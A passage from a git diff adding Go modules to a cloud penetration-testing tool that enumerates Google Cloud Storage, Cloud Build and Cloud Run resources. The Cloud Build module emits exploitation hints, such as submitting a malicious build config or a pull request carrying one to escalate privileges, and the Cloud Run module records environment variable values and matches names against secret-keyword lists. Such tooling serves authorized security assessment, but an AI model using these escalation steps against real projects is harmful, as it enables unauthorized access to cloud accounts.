restBucket.SoftDeletePolicy.RetentionDurationSeconds > 0 { + bucket.SoftDeleteEnabled = true + bucket.SoftDeleteRetentionDays = restBucket.SoftDeletePolicy.RetentionDurationSeconds / 86400 // seconds to days + } + } + + // Parse Updated timestamp + if restBucket.Updated != "" { + // REST API returns RFC3339 format + if t, err := time.Parse(time.RFC3339, restBucket.Updated); err == nil { + bucket.Updated = t.Format("2006-01-02") + } + } + + // Parse location type + bucket.LocationType = restBucket.LocationType + + // Parse Turbo Replication (for dual-region buckets) + if restBucket.Rpo == "ASYNC_TURBO" { + bucket.TurboReplication = true + } + + // Parse Lifecycle rules + if restBucket.Lifecycle != nil && len(restBucket.Lifecycle.Rule) > 0 { + bucket.LifecycleEnabled = true + bucket.LifecycleRuleCount = len(restBucket.Lifecycle.Rule) + bucket.ShortestDeleteDays = -1 // Initialize to -1 to indicate not set + + for _, rule := range restBucket.Lifecycle.Rule { + lcRule := LifecycleRule{} + + // Parse action + if rule.Action != nil { + lcRule.Action = rule.Action.Type + lcRule.StorageClass = rule.Action.StorageClass + + if rule.Action.Type == "Delete" { + bucket.HasDeleteRule = true + } else if rule.Action.Type == "SetStorageClass" { + bucket.HasArchiveRule = true + } + } + + // Parse conditions + if rule.Condition != nil { + // Age is a pointer to int64 + if rule.Condition.Age != nil && *rule.Condition.Age > 0 { + lcRule.AgeDays = *rule.Condition.Age + // Track shortest delete age + if lcRule.Action == "Delete" && (bucket.ShortestDeleteDays == -1 || *rule.Condition.Age < bucket.ShortestDeleteDays) { + bucket.ShortestDeleteDays = *rule.Condition.Age + } + } + if rule.Condition.NumNewerVersions > 0 { + lcRule.NumVersions = rule.Condition.NumNewerVersions + } + if rule.Condition.IsLive != nil { + lcRule.IsLive = rule.Condition.IsLive + } + if len(rule.Condition.MatchesPrefix) > 0 { + lcRule.MatchesPrefix = strings.Join(rule.Condition.MatchesPrefix, ",") + } + if len(rule.Condition.MatchesSuffix) > 0 { + lcRule.MatchesSuffix = strings.Join(rule.Condition.MatchesSuffix, ",") + } + if len(rule.Condition.MatchesStorageClass) > 0 { + lcRule.MatchesStorage = strings.Join(rule.Condition.MatchesStorageClass, ",") + } + if rule.Condition.CreatedBefore != "" { + lcRule.CreatedBefore = rule.Condition.CreatedBefore + } + if rule.Condition.DaysSinceCustomTime > 0 { + lcRule.DaysSinceCustom = rule.Condition.DaysSinceCustomTime + } + if rule.Condition.DaysSinceNoncurrentTime > 0 { + lcRule.DaysSinceNoncurrent = rule.Condition.DaysSinceNoncurrentTime + } + } + + bucket.LifecycleRules = append(bucket.LifecycleRules, lcRule) + } + + // If no delete rule, reset to 0 + if bucket.ShortestDeleteDays == -1 { + bucket.ShortestDeleteDays = 0 + } + } +} diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go new file mode 100644 index 00000000..8182266f --- /dev/null +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -0,0 +1,358 @@ +package cloudbuildservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudbuild "google.golang.org/api/cloudbuild/v1" +) + +type CloudBuildService struct { + session *gcpinternal.SafeSession +} + +// New creates a new CloudBuildService +func New() *CloudBuildService { + return &CloudBuildService{} +} + +// NewWithSession creates a CloudBuildService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudBuildService { + return &CloudBuildService{session: session} +} + +// getService returns a Cloud Build service client using cached session if available +func (s *CloudBuildService) getService(ctx context.Context) (*cloudbuild.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudBuildService(ctx, s.session) + } + return cloudbuild.NewService(ctx) +} + +// TriggerInfo represents a Cloud Build trigger +type TriggerInfo struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + Disabled bool `json:"disabled"` + CreateTime string `json:"createTime"` + + // Source configuration + SourceType string `json:"sourceType"` // github, cloud_source_repos, etc. + RepoName string `json:"repoName"` + BranchName string `json:"branchName"` + TagName string `json:"tagName"` + + // Build configuration + BuildConfigType string `json:"buildConfigType"` // yaml, dockerfile, inline + Filename string `json:"filename"` // cloudbuild.yaml path + ServiceAccount string `json:"serviceAccount"` // SA used for builds + Substitutions map[string]string `json:"substitutions"` + + // Security analysis + IsPublicRepo bool `json:"isPublicRepo"` + HasSecrets bool `json:"hasSecrets"` + PrivescPotential bool `json:"privescPotential"` +} + +// BuildInfo represents a Cloud Build execution +type BuildInfo struct { + ID string `json:"id"` + ProjectID string `json:"projectId"` + Status string `json:"status"` + CreateTime string `json:"createTime"` + StartTime string `json:"startTime"` + FinishTime string `json:"finishTime"` + TriggerID string `json:"triggerId"` + Source string `json:"source"` + ServiceAccount string `json:"serviceAccount"` + LogsBucket string `json:"logsBucket"` + Images []string `json:"images"` + // Pentest-specific fields + BuildSteps []BuildStep `json:"buildSteps"` + SecretEnvVars []string `json:"secretEnvVars"` + Artifacts []string `json:"artifacts"` +} + +// BuildStep represents a single step in a Cloud Build +type BuildStep struct { + Name string `json:"name"` // Container image + Args []string `json:"args"` // Command arguments + Entrypoint string `json:"entrypoint"` // Custom entrypoint + Env []string `json:"env"` // Environment variables + SecretEnv []string `json:"secretEnv"` // Secret environment variables + Volumes []string `json:"volumes"` // Mounted volumes +} + +// TriggerSecurityAnalysis contains detailed security analysis +type TriggerSecurityAnalysis struct { + TriggerName string `json:"triggerName"` + ProjectID string `json:"projectId"` + ServiceAccount string `json:"serviceAccount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + PrivescPotential bool `json:"privescPotential"` +} + +// ListTriggers retrieves all Cloud Build triggers in a project +func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var triggers []TriggerInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Triggers.List(parent) + err = req.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err != nil { + // Try with just project ID (older API) + req2 := service.Projects.Triggers.List(projectID) + err2 := req2.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err2 != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + return triggers, nil +} + +// ListBuilds retrieves recent Cloud Build executions +func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var builds []BuildInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Builds.List(parent).PageSize(limit) + resp, err := req.Do() + if err != nil { + // Try with just project ID + req2 := service.Projects.Builds.List(projectID).PageSize(limit) + resp, err = req2.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + for _, build := range resp.Builds { + info := BuildInfo{ + ID: build.Id, + ProjectID: projectID, + Status: build.Status, + CreateTime: build.CreateTime, + StartTime: build.StartTime, + FinishTime: build.FinishTime, + ServiceAccount: build.ServiceAccount, + LogsBucket: build.LogsBucket, + Images: build.Images, + } + if build.BuildTriggerId != "" { + info.TriggerID = build.BuildTriggerId + } + if build.Source != nil && build.Source.RepoSource != nil { + info.Source = build.Source.RepoSource.RepoName + } + + // Parse build steps for pentest analysis + for _, step := range build.Steps { + if step == nil { + continue + } + bs := BuildStep{ + Name: step.Name, + Args: step.Args, + Entrypoint: step.Entrypoint, + Env: step.Env, + SecretEnv: step.SecretEnv, + } + for _, vol := range step.Volumes { + if vol != nil { + bs.Volumes = append(bs.Volumes, vol.Name+":"+vol.Path) + } + } + info.BuildSteps = append(info.BuildSteps, bs) + info.SecretEnvVars = append(info.SecretEnvVars, step.SecretEnv...) + } + + // Parse artifacts + if build.Artifacts != nil { + info.Artifacts = build.Artifacts.Images + } + + builds = append(builds, info) + } + + return builds, nil +} + +// AnalyzeTriggerForPrivesc performs detailed privesc analysis on a trigger +func (s *CloudBuildService) AnalyzeTriggerForPrivesc(trigger TriggerInfo, projectID string) TriggerSecurityAnalysis { + analysis := TriggerSecurityAnalysis{ + TriggerName: trigger.Name, + ProjectID: projectID, + ServiceAccount: trigger.ServiceAccount, + RiskReasons: []string{}, + } + + score := 0 + + // Check service account privileges + if trigger.ServiceAccount == "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Uses default Cloud Build SA (often has broad permissions)") + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Default SA often has: storage.admin, source.admin, artifactregistry.admin\n"+ + "gcloud builds submit --config=malicious.yaml --project=%s", projectID)) + score += 2 + analysis.PrivescPotential = true + } else { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Build runs as: %s\n"+ + "# Check SA permissions:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", + trigger.ServiceAccount, projectID, trigger.ServiceAccount)) + } + + // GitHub PR triggers are exploitable + if trigger.SourceType == "github" && trigger.BranchName != "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "GitHub trigger may execute code from pull requests") + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# Fork repo, submit PR with malicious cloudbuild.yaml to trigger build") + score += 2 + } + + // Inline build configs might leak secrets + if trigger.BuildConfigType == "inline" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Inline build config may contain hardcoded secrets or commands") + score += 1 + } + + // Secrets in substitutions + if trigger.HasSecrets { + analysis.RiskReasons = append(analysis.RiskReasons, + "Trigger uses substitution variables that may contain secrets") + score += 1 + } + + // Add exploitation guidance + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Trigger a build manually:\n"+ + "gcloud builds triggers run %s --project=%s --branch=%s", + trigger.ID, projectID, trigger.BranchName)) + + if score >= 3 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else { + analysis.RiskLevel = "LOW" + } + + return analysis +} + +// parseTrigger converts a trigger to TriggerInfo +func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, projectID string) TriggerInfo { + info := TriggerInfo{ + ID: trigger.Id, + Name: trigger.Name, + Description: trigger.Description, + ProjectID: projectID, + Disabled: trigger.Disabled, + CreateTime: trigger.CreateTime, + Substitutions: trigger.Substitutions, + } + + // Parse source configuration + if trigger.Github != nil { + info.SourceType = "github" + info.RepoName = fmt.Sprintf("%s/%s", trigger.Github.Owner, trigger.Github.Name) + if trigger.Github.Push != nil { + info.BranchName = trigger.Github.Push.Branch + info.TagName = trigger.Github.Push.Tag + } + if trigger.Github.PullRequest != nil { + info.BranchName = trigger.Github.PullRequest.Branch + } + } else if trigger.TriggerTemplate != nil { + info.SourceType = "cloud_source_repos" + info.RepoName = trigger.TriggerTemplate.RepoName + info.BranchName = trigger.TriggerTemplate.BranchName + info.TagName = trigger.TriggerTemplate.TagName + } + + // Parse build configuration + if trigger.Filename != "" { + info.BuildConfigType = "yaml" + info.Filename = trigger.Filename + } else if trigger.Build != nil { + info.BuildConfigType = "inline" + } + + // Service account + if trigger.ServiceAccount != "" { + info.ServiceAccount = trigger.ServiceAccount + } + + // Check for secrets in substitutions + for key := range trigger.Substitutions { + if containsSecretKeyword(key) { + info.HasSecrets = true + break + } + } + + // Determine privesc potential + // Default SA is often over-privileged, GitHub triggers can execute untrusted code + if info.ServiceAccount == "" { + info.PrivescPotential = true + } + if info.SourceType == "github" && info.BranchName != "" { + info.PrivescPotential = true + } + + return info +} + +// containsSecretKeyword checks if a key might contain secrets +func containsSecretKeyword(key string) bool { + secretKeywords := []string{"SECRET", "PASSWORD", "TOKEN", "KEY", "CREDENTIAL", "AUTH"} + for _, keyword := range secretKeywords { + if containsIgnoreCase(key, keyword) { + return true + } + } + return false +} + +func containsIgnoreCase(s, substr string) bool { + return strings.Contains(strings.ToUpper(s), strings.ToUpper(substr)) +} diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go new file mode 100644 index 00000000..fdfbc617 --- /dev/null +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -0,0 +1,721 @@ +package cloudrunservice + +import ( + "context" + "fmt" + "strings" + "sync" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + run "google.golang.org/api/run/v2" +) + +type CloudRunService struct{ + session *gcpinternal.SafeSession +} + +func New() *CloudRunService { + return &CloudRunService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CloudRunService { + return &CloudRunService{ + session: session, + } +} + +func (crs *CloudRunService) getServiceV2(ctx context.Context) (*run.Service, error) { + if crs.session != nil { + return sdk.CachedGetCloudRunServiceV2(ctx, crs.session) + } + return run.NewService(ctx) +} + +// ServiceInfo holds Cloud Run service details with security-relevant information +type ServiceInfo struct { + // Basic info + Name string + ProjectID string + Region string + Description string + Creator string + UpdateTime string + + // URL and traffic + URL string + LatestRevision string + LatestReadyRevision string + TrafficAllOnLatest bool + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // INGRESS_TRAFFIC_ALL, INGRESS_TRAFFIC_INTERNAL_ONLY, INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER + VPCAccess string // VPC Connector or Direct VPC + VPCEgressSettings string // ALL_TRAFFIC, PRIVATE_RANGES_ONLY + BinaryAuthorizationPolicy string + + // Container configuration + ContainerImage string + ContainerPort int64 + CPULimit string + MemoryLimit string + MaxInstances int64 + MinInstances int64 + Timeout string + + // Environment variables (counts, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret // Potential secrets in env vars (not using Secret Manager) + UsesDefaultSA bool // Uses default compute service account + + // Detailed env var and secret info + EnvVars []EnvVarInfo // All environment variables + SecretRefs []SecretRefInfo // All Secret Manager references + + // IAM + InvokerMembers []string + IsPublic bool + IAMBindings []IAMBinding // All IAM bindings on this service + + // Status + Status string // Service status +} + +// HardcodedSecret represents a potential secret found in environment variables +type HardcodedSecret struct { + EnvVarName string + SecretType string // password, api-key, token, credential, connection-string +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct", "secret-manager", or "config-map" + // For Secret Manager references + SecretName string + SecretVersion string +} + +// SecretRefInfo represents a Secret Manager reference used by the service +type SecretRefInfo struct { + EnvVarName string // The env var name that references this secret + SecretName string // Secret Manager secret name + SecretVersion string // Version (e.g., "latest", "1") + MountPath string // For volume mounts, the path where it's mounted + Type string // "env" or "volume" +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// JobInfo holds Cloud Run job details +type JobInfo struct { + Name string + ProjectID string + Region string + ServiceAccount string + ContainerImage string + LastExecution string + Creator string + UpdateTime string + + // Configuration + TaskCount int64 + Parallelism int64 + MaxRetries int64 + Timeout string + + // VPC Access + VPCAccess string + VPCEgressSettings string + + // Environment + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret + UsesDefaultSA bool + + // Detailed env var and secret info + EnvVars []EnvVarInfo + SecretRefs []SecretRefInfo + + // IAM + IAMBindings []IAMBinding // All IAM bindings on this job + + // Status + Status string +} + +// Services retrieves all Cloud Run services in a project across all regions +// Note: This excludes Cloud Functions 2nd gen which are deployed as Cloud Run services +// but should be enumerated via the functions module instead +func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { + ctx := context.Background() + + service, err := cs.getServiceV2(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var services []ServiceInfo + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Services.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + // Skip Cloud Functions 2nd gen - they have label "goog-managed-by: cloudfunctions" + // These should be enumerated via the functions module, not cloudrun + if isCloudFunction(svc.Labels) { + continue + } + + info := parseServiceInfo(svc, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := cs.getServiceIAMPolicy(service, svc.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.InvokerMembers, info.IsPublic = parseAllIAMBindings(iamPolicy) + } + + services = append(services, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + return services, nil +} + +// isCloudFunction checks if a Cloud Run service is actually a Cloud Function 2nd gen +// Cloud Functions 2nd gen are deployed as Cloud Run services but have specific labels +func isCloudFunction(labels map[string]string) bool { + if labels == nil { + return false + } + // Cloud Functions 2nd gen have "goog-managed-by: cloudfunctions" label + if managedBy, ok := labels["goog-managed-by"]; ok && managedBy == "cloudfunctions" { + return true + } + return false +} + +// Jobs retrieves all Cloud Run jobs in a project across all regions +// Note: The Cloud Run Jobs API does NOT support the "-" wildcard for locations +// unlike the Services API, so we must iterate through regions explicitly +func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := cs.getServiceV2(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var jobs []JobInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // Iterate through all Cloud Run regions in parallel + for _, region := range regions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + + call := service.Projects.Locations.Jobs.List(parent) + err := call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + + // Try to get IAM policy for job + iamPolicy, iamErr := cs.getJobIAMPolicy(service, job.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, _, _ = parseAllIAMBindings(iamPolicy) + } + + mu.Lock() + jobs = append(jobs, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have jobs or API may not be enabled + // Common errors: 404 (no jobs in region), 403 (permission denied) + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } + + wg.Wait() + + // Only return error if we got no jobs AND had errors + // If we found jobs in some regions, that's success + if len(jobs) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "run.googleapis.com") + } + + return jobs, nil +} + +// parseServiceInfo extracts relevant information from a Cloud Run service +func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) ServiceInfo { + info := ServiceInfo{ + Name: extractName(svc.Name), + ProjectID: projectID, + Description: svc.Description, + Creator: svc.Creator, + UpdateTime: svc.UpdateTime, + URL: svc.Uri, + } + + // Parse conditions for status + if len(svc.Conditions) > 0 { + for _, cond := range svc.Conditions { + if cond.Type == "Ready" { + if cond.State == "CONDITION_SUCCEEDED" { + info.Status = "Ready" + } else { + info.Status = cond.State + if cond.Reason != "" { + info.Status = cond.Reason + } + } + break + } + } + } + if info.Status == "" { + info.Status = "Unknown" + } + + // Extract region from service name + // Format: projects/{project}/locations/{location}/services/{name} + parts := strings.Split(svc.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Ingress settings + info.IngressSettings = svc.Ingress + + // Latest revision info + info.LatestRevision = svc.LatestCreatedRevision + info.LatestReadyRevision = svc.LatestReadyRevision + + // Check if all traffic goes to latest + for _, traffic := range svc.Traffic { + if traffic.Type == "TRAFFIC_TARGET_ALLOCATION_TYPE_LATEST" && traffic.Percent == 100 { + info.TrafficAllOnLatest = true + break + } + } + + // Binary authorization + if svc.BinaryAuthorization != nil { + info.BinaryAuthorizationPolicy = svc.BinaryAuthorization.Policy + if svc.BinaryAuthorization.UseDefault { + info.BinaryAuthorizationPolicy = "default" + } + } + + // Template configuration (current revision settings) + if svc.Template != nil { + info.ServiceAccount = svc.Template.ServiceAccount + info.Timeout = svc.Template.Timeout + + if svc.Template.Scaling != nil { + info.MaxInstances = svc.Template.Scaling.MaxInstanceCount + info.MinInstances = svc.Template.Scaling.MinInstanceCount + } + + // VPC access configuration + if svc.Template.VpcAccess != nil { + info.VPCAccess = svc.Template.VpcAccess.Connector + info.VPCEgressSettings = svc.Template.VpcAccess.Egress + if info.VPCAccess == "" && svc.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + + // Container configuration + if len(svc.Template.Containers) > 0 { + container := svc.Template.Containers[0] + info.ContainerImage = container.Image + + // Port + if len(container.Ports) > 0 { + info.ContainerPort = container.Ports[0].ContainerPort + } + + // Resources + if container.Resources != nil { + if container.Resources.Limits != nil { + if cpu, ok := container.Resources.Limits["cpu"]; ok { + info.CPULimit = cpu + } + if mem, ok := container.Resources.Limits["memory"]; ok { + info.MemoryLimit = mem + } + } + } + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + // Check if this volume is a secret + for _, svcVol := range svc.Template.Volumes { + if svcVol.Name == vol.Name && svcVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: svcVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + + return info +} + +// parseJobInfo extracts relevant information from a Cloud Run job +func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Creator: job.Creator, + UpdateTime: job.UpdateTime, + } + + // Extract region from job name + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Parse conditions for status + if len(job.Conditions) > 0 { + for _, cond := range job.Conditions { + if cond.Type == "Ready" { + if cond.State == "CONDITION_SUCCEEDED" { + info.Status = "Ready" + } else { + info.Status = cond.State + if cond.Reason != "" { + info.Status = cond.Reason + } + } + break + } + } + } + if info.Status == "" { + info.Status = "Unknown" + } + + // Last execution + if job.LatestCreatedExecution != nil { + info.LastExecution = job.LatestCreatedExecution.Name + } + + // Template configuration + if job.Template != nil { + info.TaskCount = job.Template.TaskCount + info.Parallelism = job.Template.Parallelism + + if job.Template.Template != nil { + info.MaxRetries = job.Template.Template.MaxRetries + info.Timeout = job.Template.Template.Timeout + info.ServiceAccount = job.Template.Template.ServiceAccount + + // VPC access configuration + if job.Template.Template.VpcAccess != nil { + info.VPCAccess = job.Template.Template.VpcAccess.Connector + info.VPCEgressSettings = job.Template.Template.VpcAccess.Egress + if info.VPCAccess == "" && job.Template.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + + // Container configuration + if len(job.Template.Template.Containers) > 0 { + container := job.Template.Template.Containers[0] + info.ContainerImage = container.Image + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + for _, jobVol := range job.Template.Template.Volumes { + if jobVol.Name == vol.Name && jobVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: jobVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + } + + return info +} + +// getServiceIAMPolicy retrieves the IAM policy for a Cloud Run service +func (cs *CloudRunService) getServiceIAMPolicy(service *run.Service, serviceName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Services.GetIamPolicy(serviceName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getJobIAMPolicy retrieves the IAM policy for a Cloud Run job +func (cs *CloudRunService) getJobIAMPolicy(service *run.Service, jobName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Jobs.GetIamPolicy(jobName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseAllIAMBindings extracts all IAM bindings, invokers, and checks for public access +func parseAllIAMBindings(policy *run.GoogleIamV1Policy) ([]IAMBinding, []string, bool) { + var allBindings []IAMBinding + var invokers []string + isPublic := false + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + allBindings = append(allBindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + + // Check for invoker role + if binding.Role == "roles/run.invoker" { + invokers = append(invokers, binding.Members...) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + } + } + } + } + + return allBindings, invokers, isPublic +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// secretPatterns maps env var name patterns to secret types +var secretPatterns = map[string]string{ + "PASSWORD": "password", + "PASSWD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "APIKEY": "api-key", + "API-KEY": "api-key", + "TOKEN": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER": "token", + "CREDENTIAL": "credential", + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "CONNECTION_STRING": "connection-string", + "CONN_STR": "connection-string", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "DB_PASS": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "REDIS_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_ACCESS_KEY": "credential", + "AWS_SECRET": "credential", + "AZURE_KEY": "credential", + "GCP_KEY": "credential", + "ENCRYPTION_KEY": "credential", + "SIGNING_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + "OAUTH": "credential", + "CLIENT_SECRET": "credential", +} + +// detectHardcodedSecrets analyzes env vars to find potential hardcoded secrets +func detectHardcodedSecrets(envVars []*run.GoogleCloudRunV2EnvVar) []HardcodedSecret { + var secrets []HardcodedSecret + + for _, env := range envVars { + if env == nil { + continue + } + + // Skip if using Secret Manager reference + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + continue + } + + // Only flag if there's a direct value (not empty) + if env.Value == "" { + continue + } + + envNameUpper := strings.ToUpper(env.Name) + + for pattern, secretType := range secretPatterns { + if strings.Contains(envNameUpper, pattern) { + secrets = append(secrets, HardcodedSecret{ + EnvVarName: env.Name, + SecretType: secretType, + }) + break + } + } + } + + return secrets +} + +// isDefaultServiceAccount checks if the service account is a default compute SA +func isDefaultServiceAccount(sa, projectID string) bool { + if sa == "" { + return true // Empty means using default + } + // Default compute SA pattern: {project-number}-compute@developer.gserviceaccount.com + return strings.Contains(sa, "-compute@developer.gserviceaccount.com") +} diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go new file mode 100644 index 00000000..59004994 --- /dev/null +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -0,0 +1,283 @@ +package cloudsqlservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal 